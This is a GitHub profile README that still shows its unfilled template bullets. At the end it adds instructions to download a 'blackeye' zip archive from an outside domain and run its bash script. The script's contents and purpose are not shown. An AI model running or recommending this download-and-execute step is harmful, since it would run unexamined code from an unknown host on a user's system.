- 👋 Hi, I’m @meshan1996
- 👀 I’m interested in ...
- 🌱 I’m currently learning ...
- 💞️ I’m looking to collaborate on ...
- 📫 How to reach me ...

<!---
meshan1996/meshan1996 is a ✨ special ✨ repository because its `README.md` (this file) appears on your GitHub profile.
You can click the Preview link to take a look at your changes.
--->
Download and clone on https://blackeye.ericksonholding.com/blackeye.zip to your computer 
cd blackeye
bash blackeye.sh
